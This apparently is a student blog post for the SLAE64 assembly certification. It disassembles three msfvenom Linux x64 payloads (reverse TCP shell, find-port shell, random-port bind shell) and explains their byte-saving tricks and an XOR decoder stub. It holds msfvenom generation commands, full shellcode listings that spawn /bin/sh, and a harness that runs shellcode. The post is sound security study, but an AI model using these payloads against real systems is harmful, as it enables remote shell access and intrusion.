There are 9 different payloads besides the meterpreter ones at the time of this writing. Some seem more interesting than others. My picks are:
- linux/x64/shell_reverse_tcp: Let’s see how different this implementation is from the custom reverse shell I wrote.
- linux/x64/shell_find_port: I’m interested in how this payload goes about finding the open port.
- linux/x64/shell_bind_tcp_random_port: It’ll be interesting to see how the random choice is made.
Issue this command to generate the payload:
msfvenom -a x64 --platform linux -p linux/x64/<PAYLOAD> -f <FORMAT>
Now we’ll need to disassemble this code. To do this, I exported the payloads in raw format and disassembled them using radare2.
You can print the disassembled payload by issuing:
> radare2 <PAYLOAD>.raw -c "pd $r"
# This will return the full disassembly view
> radare2 <PAYLOAD>.raw -c "pi $r"
# This will return the instructions without the extra stuff
If you want to follow along I’d recommend having a Linux syscall table at hand since most of the code is about chaining system calls.
To test our shellcode, we can parse it using xxd or any similar tool, then generate an executable to run with gdb.
I’ve created a script that outputs a compiled C executable given a shellcode string.
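The script itself is not reproduced here, so the following is only a minimal sketch of the idea in Python. The helper names `to_c_array` and `make_harness`, the C template, and the use of mmap are all assumptions made for illustration, not the original script. It turns raw shellcode bytes into a C source file that copies them into executable memory and jumps to them.

```python
C_TEMPLATE = """\
#include <string.h>
#include <sys/mman.h>

/* shellcode bytes generated from the raw payload */
unsigned char code[] = { @BYTES@ };

int main(void) {
    /* map a read/write/execute region, copy the shellcode in, and call it */
    void *mem = mmap(NULL, sizeof(code), PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return 1;
    memcpy(mem, code, sizeof(code));
    ((void (*)(void))mem)();
    return 0;
}
"""


def to_c_array(shellcode: bytes) -> str:
    """Format raw bytes as a comma-separated list of C hex literals."""
    return ", ".join(f"0x{b:02x}" for b in shellcode)


def make_harness(shellcode: bytes) -> str:
    """Return C source for a test harness (hypothetical helper)."""
    return C_TEMPLATE.replace("@BYTES@", to_c_array(shellcode))


if __name__ == "__main__":
    # First bytes of the reverse shell: push 0x29; pop rax; cdq
    print(make_harness(bytes.fromhex("6a295899")))
```

The generated source can then be compiled with gcc and the resulting binary stepped through in gdb.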
2.a Analysis of “Shell Reverse TCP”
The first sample is the reverse TCP payload without any options:
The first block makes a socket syscall:
push 0x29
pop rax ; loads 0x29 into rax
cdq ; fill rdx with 0s
push 2
pop rdi ; loads 0x02 into rdi
push 1
pop rsi ; loads 0x01 into rsi
syscall ; sys_socket(ipv4, tcp, 0)
We can see the writer uses push <val> and then pop <reg> to avoid null bytes and reduce payload size. For 1 byte values, this combo occupies just 3 bytes:
6a29 push 0x29
58 pop rax
Compared with the equivalent mov instruction, which takes 7 bytes and contains three null bytes, this is a big improvement:
48c7c029000000 mov rax, 0x29
Another nice trick is the use of cdq. This instruction sign-extends eax into edx, and in 64-bit mode a write to edx also clears the upper half of rdx. Since eax holds a positive value at this point, rdx ends up filled with zeros. Using this trick the writer is able to zero out rdx with just one byte!
99 cdq ; 1 byte long, no null bytes
; Compared with other options:
48c7c200000000 mov rdx,0 ; 7 bytes long, contains null bytes
6a00 push 0
5a pop rdx ; 3 bytes long and contains a null byte
4831d2 xor rdx,rdx ; 3 bytes long, no null bytes
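To make the comparison concrete, here is a small Python sketch. It models what cdq does to edx and tallies the size and null bytes of the four encodings listed above. The function name `cdq_edx` and the table layout are purely illustrative.

```python
def cdq_edx(eax: int) -> int:
    """Model cdq: edx becomes all ones if bit 31 of eax is set, else zero."""
    return 0xFFFFFFFF if eax & 0x80000000 else 0


# Encodings copied from the listing above (hex bytes -> mnemonic)
OPTIONS = {
    "99": "cdq",
    "48c7c200000000": "mov rdx, 0",
    "6a005a": "push 0; pop rdx",
    "4831d2": "xor rdx, rdx",
}

for hex_bytes, mnemonic in OPTIONS.items():
    raw = bytes.fromhex(hex_bytes)
    has_null = 0 in raw  # True if any byte of the encoding is 0x00
    print(f"{mnemonic:16} {len(raw)} bytes, null bytes: {has_null}")

# eax holds 0x29 after the push/pop pair, so cdq leaves edx at zero
print(hex(cdq_edx(0x29)))
```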
As we now have a socket ready the following block handles the connection:
xchg rax, rdi ; the socket file descriptor is loaded into rdi
movabs rcx, 0x100007f5c110002
push rcx ; pushes the value onto the stack
mov rsi, rsp ; loads address of 0x100007f5c110002 into rsi
push 0x10
pop rdx ; loads 0x10 as address len
push 0x2a ; 0x2a is the "connect" syscall number
pop rax
syscall ; sys_connect syscall
We see another nice trick in the first line: xchg rax, rdi loads the socket file descriptor into rdi using just two bytes!
The next couple of lines push a value onto the stack and load its address into rsi. What’s this value? Let’s find out:
Looking at the syscall table, we can see that the rsi register should hold a struct sockaddr *uservaddr, so it makes sense for it to be an address, as the syscall needs a pointer to the struct. The content of the struct can be reverse engineered. We know it must contain an IP address. How many bytes are needed to represent an address? The answer is 4:
each number in an IP address ranges from 0 to 255, and 256 = 2^8, so 1 byte is needed per number
each IP address consists of 4 numbers, therefore 4 bytes are needed
During the following explanation, keep in mind that the disassembly shows the immediate as the 7.5-byte value 0x100007f5c110002 (the leading zero is dropped), but it is placed into rcx as the 8-byte value 0x0100007f5c110002.
If we take the first 4 bytes of 0x0100007f5c110002 (0x0100007f), reverse the endianness, and convert them to an IP, we get 127.0.0.1.
The next two bytes (0x5c11) are the port number. Reversing the endianness gives 0x115c, the hex representation of 4444. The remaining 0x0002 is the address family, AF_INET.
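The same decoding can be checked with a few lines of Python. This is a sketch that assumes the usual sockaddr_in layout (2-byte family, 2-byte port, 4-byte address). The variable names are illustrative.

```python
import socket
import struct

# The 8-byte immediate that the payload loads into rcx and pushes
IMMEDIATE = 0x0100007F5C110002

# x86-64 is little-endian, so this is how the bytes sit on the stack
raw = struct.pack("<Q", IMMEDIATE)

family = struct.unpack_from("<H", raw, 0)[0]  # sin_family, host byte order
port = struct.unpack_from(">H", raw, 2)[0]    # sin_port, network byte order
ip = socket.inet_ntoa(raw[4:8])               # sin_addr, network byte order

print(family, port, ip)  # 2 4444 127.0.0.1
```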
The next block loops over the file descriptors for stdin, stdout, and stderr and duplicates them using the dup2 syscall. The file descriptor for our recently opened socket is loaded into the rdi register already.
; we already loaded the socket fd into rdi
; remember we exchanged rax and rdi values in the last block
6a03 push 3
5e pop rsi ; loads 3 into rsi
┌─> 48ffce dec rsi
╎ 6a21 push 0x21
╎ 58 pop rax ; load 0x21 into rax
╎ 0f05 syscall ; sys_dup2 syscall
└─< 75f6 jne 0x27
Two nice details from this part:
- The writer saves some bytes by having the value of rdi loaded in the previous block instead of passing it around from register to register or pushing it into the stack.
- The break condition of the loop is implemented without a cmp instruction. It just looks at the ZF (zero flag), which will be set in the last round, when dec rsi brings rsi down to 0. Great way of saving some more bytes!
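The control flow of that loop can be traced with a short Python model. It is a sketch, not a translation of the payload: the function name `dup2_loop` is made up, no real syscalls are issued, and it assumes (as the payload does) that the flags set by dec are still intact when jne runs.

```python
def dup2_loop(sock_fd: int, start: int = 3):
    """Trace the dup2 calls made by the loop as (oldfd, newfd) pairs."""
    calls = []
    rsi = start
    while True:
        rsi -= 1                      # dec rsi, sets ZF when rsi reaches 0
        calls.append((sock_fd, rsi))  # sys_dup2(rdi, rsi)
        if rsi == 0:                  # jne falls through once ZF is set
            break
    return calls


print(dup2_loop(sock_fd=3))  # [(3, 2), (3, 1), (3, 0)]
```

The socket ends up duplicated onto stderr, stdout, and stdin, in that order.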
The last portion of the code corresponds to the actual shell being popped. An execve “/bin/sh” call is made. Let’s see how:
6a3b push 0x3b
58 pop rax ; loads 0x3b into rax
99 cdq ; fill rdx with zeros
48bb2f62696e movabs rbx, 0x68732f6e69622f ; '/bin/sh'
53 push rbx
4889e7 mov rdi, rsp ; loads the address of '/bin/sh' into rdi
52 push rdx ; pushes a null qword onto the stack
57 push rdi ; pushes the address of '/bin/sh' onto the stack
4889e6 mov rsi, rsp ; loads the address of the null-terminated
; argv array ['/bin/sh', NULL] into rsi
0f05 syscall ; sys_execve syscall
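To see why the immediate in the movabs spells out the path, we can lay it out in memory the way push rbx does. A small Python sketch, with `qword_to_bytes` as an illustrative helper name:

```python
import struct


def qword_to_bytes(value: int) -> bytes:
    """Return the 8 bytes a little-endian push of value leaves on the stack."""
    return struct.pack("<Q", value)


stack_bytes = qword_to_bytes(0x68732F6E69622F)
print(stack_bytes)  # b'/bin/sh\x00'
```

The immediate is only 7 bytes wide, so the eighth byte is zero and doubles as the string terminator.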
Now let’s compare this raw version with the one without bad characters. I used a list of common bad characters (such as null-byte, space, break, etc) to produce another payload. The exact command used is:
msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp -f raw -b '\x00\x09\x0a\x0d\x1a\x20' > msfvenom-shell_reverse_tcp_NOBADCHARS.raw
The result was this:
Basically, msfvenom avoided the bad chars by applying a XOR encoder. This worked, but it also grew our shellcode from 73 bytes to 119, a 63% rise in size. Let’s see how the decoder stub works; the rest we have covered already:
; fills rcx with zeros, then changes its value to 0x0a (10)
4831c9 xor rcx, rcx
4881e9f6ffff sub rcx, 0xfffffffffffffff6
; RIP-relative lea: loads the address of offset 0 (the start of the stub) into rax
488d05efffff lea rax, [0x00000000]
; loads the key into rbx
48bba062921b movabs rbx, 0x2cbc29441b9262a0
┌─> 48315827 xor qword [rax + 0x27], rbx
╎ 482df8ffffff sub rax, 0xfffffffffffffff8
└─< e2f4 loop 0x1b
In summary, this loads the length of the encoded payload (in qwords) into rcx, a pointer to the start of the shellcode into rax, and the decryption key into rbx. Then it goes from rax + 0x27 to the end, one qword per iteration, and XORs the encoded shellcode with the key (the decoder stub occupies offsets 0x00 to 0x26, so the encoded shellcode starts at offset 0x27). Once the loop is done, execution falls through into the now-decoded shellcode.
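The decoding loop is easy to model in Python. The sketch below is an illustration rather than msfvenom's encoder: the helper name `xor_qwords` is made up, and padding the data with zero bytes up to a multiple of 8 is an assumption. Since XOR is its own inverse, the same function both encodes and decodes.

```python
import struct

KEY = 0x2CBC29441B9262A0  # key loaded into rbx in the listing above
MASK64 = (1 << 64) - 1


def xor_qwords(data: bytes, key: int = KEY) -> bytes:
    """XOR data with key one little-endian qword at a time."""
    padded = data + b"\x00" * (-len(data) % 8)  # assumption: zero padding
    return b"".join(
        struct.pack("<Q", qword ^ key)
        for (qword,) in struct.iter_unpack("<Q", padded)
    )


# sub rcx, 0xfffffffffffffff6 on a zeroed rcx wraps around to 10
loop_count = (0 - 0xFFFFFFFFFFFFFFF6) & MASK64

# A 73-byte payload needs ceil(73 / 8) qwords
qwords_needed = -(-73 // 8)

# Round trip on the first bytes of the reverse shell payload
plain = bytes.fromhex("6a2958996a025f6a015e0f05")
encoded = xor_qwords(plain)
decoded = xor_qwords(encoded)[: len(plain)]

print(loop_count, qwords_needed, decoded == plain)  # 10 10 True
```

The loop counter in rcx matches the number of qwords needed to cover the original payload.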
There’s something strange about this decoder stub: the rest of the payloads so far were written pretty tight in terms of size, but here we have a bunch of 6- and 7-byte instructions (the listing truncates the longer encodings). The reverse TCP payload is 34 instructions and 73 bytes long, which gives us a ratio of ~2.15 bytes per instruction. For the decoder stub, we have 7 instructions and 39 bytes (0x27, the offset where the encoded shellcode starts). A surprising ratio of ~5.57!
2.b Analysis of “Shell Find Port”
4831ff xor rdi, rdi ; rdi = 0
4831db xor rbx, rbx ; rbx = 0
b314 mov bl, 0x14 ; rbx = 0x14 (20)
4829dc sub rsp, rbx ; makes space in the stack
; (20 bytes)
488d1424 lea rdx, [rsp] ; loads stack address into rdx
488d742404 lea rsi, [rsp + 4]
┌─> 6a34 push 0x34
╎ 58 pop rax ; loads 0x34 (52) into rax
╎ 0f05 syscall ; sys_getpeername syscall
╎ 48ffc7 inc rdi
╎ 66817e021341 cmp word [rsi + 2], 0x4113
└─< 75f0 jne 0x14
If we check the manual for the getpeername syscall, we’ll see that it writes the address of the peer connected to a given socket file descriptor into a caller-supplied buffer.
It expects a file descriptor in rdi, so the payload starts with rdi at 0 and tries every file descriptor in turn until it finds a socket whose peer port matches the one specified in the options. The peer address is written into a sockaddr struct (rsi acts as the pointer to this struct), and the port sits at offset 2 in network byte order. The comparison value 0x4113 therefore matches the bytes 0x13 0x41 in memory, which is port 0x1341 (4929).
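The same search can be sketched in Python on a loopback connection. This is an illustration under assumptions, not a port of the payload: the function names `find_fd_by_peer_port` and `demo` and the `max_fd` limit are made up, and `socket.fromfd` is used so that probing works on a duplicate and never closes the descriptor being examined.

```python
import socket


def find_fd_by_peer_port(wanted_port: int, max_fd: int = 256):
    """Return the first fd whose connected peer uses wanted_port, or None."""
    for fd in range(max_fd):
        try:
            # fromfd() duplicates fd, so closing the probe leaves fd open
            probe = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
        except OSError:
            continue  # fd is not open
        try:
            peer = probe.getpeername()
        except OSError:
            continue  # not a socket, or not connected
        finally:
            probe.close()
        if isinstance(peer, tuple) and peer[1] == wanted_port:
            return fd
    return None


def demo() -> bool:
    """Connect to ourselves, then locate the accepted socket by peer port."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(1)
    client = socket.create_connection(server.getsockname())
    conn, peer = server.accept()
    try:
        return find_fd_by_peer_port(peer[1]) == conn.fileno()
    finally:
        for sock in (conn, client, server):
            sock.close()


if __name__ == "__main__":
    print(demo())
```

The payload does the equivalent with raw getpeername syscalls, comparing the port bytes directly instead of parsing the struct.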
After having found the right socket, the payload duplicates stdin, stdout, and stderr using a loop similar to the one we saw in the previous payload, and then executes a shell.
2.c Analysis of “Shell Bind TCP Random Port”
4831f6 xor rsi, rsi ; rsi = 0
48f7e6 mul rsi ; rax = 0 rdx = 0
ffc6 inc esi ; rsi = 1
6a02 push 2
5f pop rdi ; rdi = 2
b029 mov al, 0x29 ; rax = 0x29
0f05 syscall ; sys_socket syscall
We see here another technique to set rax and rdx to zero indirectly: mul rsi multiplies rax by rsi (0) and places the 128-bit result into rdx:rax, so both registers end up as 0.
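A quick Python model of the unsigned 64-bit mul shows why this works whatever rax held before. The helper name `mul64` is illustrative.

```python
MASK64 = (1 << 64) - 1


def mul64(rax: int, src: int):
    """Model unsigned mul: return (rdx, rax) holding the 128-bit product."""
    product = (rax & MASK64) * (src & MASK64)
    return product >> 64, product & MASK64


# Any starting rax multiplied by rsi = 0 clears both halves of the result
print(mul64(0xDEADBEEFCAFEBABE, 0))  # (0, 0)
```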
The next block makes a listen syscall, then accept syscall, then a loop invoking dup2 for each standard stream and finally the execve(“/bin/sh”).
; listen syscall block
52 push rdx
5e pop rsi
50 push rax
5f pop rdi
b032 mov al, 0x32
0f05 syscall ; sys_listen syscall
; accept syscall block
b02b mov al, 0x2b
0f05 syscall ; sys_accept syscall
; sys_dup2 is invoked 3 times, one for each stream
57 push rdi
5e pop rsi
4897 xchg rax, rdi
┌─> ffce dec esi
╎ b021 mov al, 0x21
╎ 0f05 syscall
└─< 75f8 jne 0x1f
; execve syscall block code
52 push rdx
48bf2f2f6269. movabs rdi, 0x68732f6e69622f2f ; '//bin/sh'
57 push rdi
54 push rsp
5f pop rdi
b03b mov al, 0x3b
0f05 syscall ; execve syscall
If we run this payload we see a connection being opened and it’s actually being fired on random ports but… where’s the random port selection? There’s no apparent place where a random number is generated!
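One observation that may help here: the listing above never makes a bind syscall before listen. On Linux, calling listen on an unbound TCP socket makes the kernel pick an ephemeral port for it, which would account for the changing port without any random number generation in the payload itself. This is an inference from the listing rather than something confirmed elsewhere in this post, and the short Python sketch below only demonstrates the kernel behaviour, assuming a Linux host. The function name `listen_without_bind` is made up.

```python
import socket


def listen_without_bind() -> int:
    """Listen on an unbound TCP socket and return the port the kernel chose."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.listen(1)  # no bind() call beforehand
        return sock.getsockname()[1]


if __name__ == "__main__":
    print(listen_without_bind())
```

Running it several times should print different port numbers.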
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification
Student ID: SLAE64–1326